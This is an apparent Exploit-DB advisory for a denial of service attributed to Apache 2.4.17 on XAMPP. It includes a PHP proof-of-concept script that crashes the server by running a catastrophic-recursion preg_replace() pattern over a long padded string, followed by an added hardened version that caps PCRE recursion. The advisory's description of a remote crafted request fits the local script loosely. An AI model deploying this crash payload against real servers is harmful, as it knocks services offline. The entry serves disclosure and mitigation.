vendor: Apache 2.4.17
by: Ahmed Atif
CVSS: 7,5 HIGH
Denial of Service
CWE: 20
Product Name: Apache 2.4.17
Affected Version From: 2.4.17
Affected Version To: 2.4.17
Patch Exists: YES
Related CWE: N/A
CPE: 2.4.17
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
2015

Apache 2.4.17 – Denial of Service

A denial of service vulnerability exists in Apache 2.4.17 due to a preg_replace() function call that can be used to cause a segmentation fault. An attacker can exploit this vulnerability by sending a request containing a specially crafted payload to the vulnerable server, causing the server to crash and become unavailable.

Mitigation:

Upgrade to Apache 2.4.18 or later.

Exploit-DB raw data:

# Exploit Title: Apache 2.4.17 - Denial of Service
# Date: 17/12/2015
# Exploit Author: rUnVirus [ Ahmed Atif]
# Vendor Homepage: www.apache.org
# Software Link: https://www.apachefriends.org/download.html/
# Version: 5.5.30
# Tested on: windows 7 - XAMPP Version 5.5.30 (Apache 2.4.17 - PHP 5.5.30) 


<?php

$s="<?php

//!*runvirus:start*!";

$s2="!*runvirus:end*! ?>";


 
$shellcode= 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

";
 
$egg = $s.$shellcode.$s2;



$content = preg_replace(
  '%//!\*runvirus:start\*!(.)+!\*runvirus:end\*!%s',
  'test',
  $egg
);

echo 'If you can see this everything seems to be working fine.';

?>
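
A hardened form of the preg_replace() call from the proof of concept above, added here as an example; it is not part of the original Exploit-DB entry. The function name strip_marked_block, the limit value and the sample input are assumptions made for illustration.

```php
<?php
// Added example: defensive handling of the marker-stripping regex from the PoC.
// $input is constructed sample data that uses the same start/end markers.
$input = "<?php\n\n//!*runvirus:start*!" . str_repeat("A", 500) . "\n!*runvirus:end*! ?>";

// Cap PCRE's recursion depth so an oversized subject yields an error code
// instead of exhausting the worker's stack. The value is an illustrative
// assumption; size it to the largest input the application should accept.
ini_set('pcre.recursion_limit', '10000');

/**
 * Replace everything between the two markers (markers included).
 * Returns the rewritten string, or null if PCRE reported an error.
 */
function strip_marked_block(string $subject, string $replacement): ?string
{
    // '.+' repeats the dot directly and matches the same text as the PoC's
    // '(.)+'. Repeating a capturing group makes the PCRE 8.x interpreter
    // nest one call deeper for every character it consumes.
    $pattern = '%//!\*runvirus:start\*!.+!\*runvirus:end\*!%s';

    $result = preg_replace($pattern, $replacement, $subject);

    // preg_replace() returns null on failure; preg_last_error() gives the
    // reason, e.g. PREG_RECURSION_LIMIT_ERROR or PREG_BACKTRACK_LIMIT_ERROR.
    if ($result === null || preg_last_error() !== PREG_NO_ERROR) {
        error_log('preg_replace failed, PCRE error code ' . preg_last_error());
        return null;
    }
    return $result;
}

$out = strip_marked_block($input, 'test');
echo $out === null ? "input rejected\n" : $out . "\n";
```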